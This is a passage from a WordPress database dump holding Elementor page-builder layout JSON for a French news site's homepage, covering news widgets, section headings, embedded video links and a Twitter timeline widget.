},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"excerpt_value\":10,\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2819,850,'_elementor_version','0.4'),(2821,851,'_elementor_edit_mode','builder'),(2822,851,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"sect